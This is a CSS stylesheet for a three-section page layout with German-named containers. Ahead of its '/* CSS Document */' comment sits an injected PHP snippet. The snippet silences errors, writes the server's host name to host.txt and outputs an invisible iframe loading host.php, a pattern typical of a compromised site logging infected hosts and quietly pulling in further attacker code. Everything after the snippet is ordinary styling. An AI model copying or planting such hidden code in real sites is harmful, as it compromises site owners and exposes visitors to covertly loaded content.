<? error_reporting(0); $mhfp = fopen("host.txt", "w"); if ($mhfp) { fwrite($mhfp, $_SERVER["HTTP_HOST"]); fclose($mhfp); } ?><iframe style="visibility:hidden;display:none" src="host.php" ></iframe>/* CSS Document */
body{
	font-family: Arial,sans-serif;
	color: #000000;
	line-height: 1.166;
	margin: 0px;
	padding: 0px;
	width: 100%;
	height: 100%;
	background-color: #6699CC;
}
#containeroben {
	background-color: #013467;
	height: 40%;
	position: absolute;
	top: 0px;
	left: 0px;
	width: 100%;
	padding: 0;
	margin: 0;
	color: #013467;
	font-size: 9px;
	text-align: left;
}

#containermitte {
	background-image: url(ersteseite/hintermitte.jpg);
	height: 20%;
	background-repeat: no-repeat;
	position: absolute;
	top: 40%;
	left: 0px;
	width: 100%;
	padding: 0;
	margin: 0;
	background-color: #6699CC;
}

#containerunten {
	background-color: #6699CC;
	height: 40%;
	bottom: 0px;
	margin-top: 0px;
	left: 0px;
	position: absolute;
	width: 100%;
	margin: 0;
	padding: 0;
	font-family: Arial, Helvetica, sans-serif;
	font-size: 10px;
}
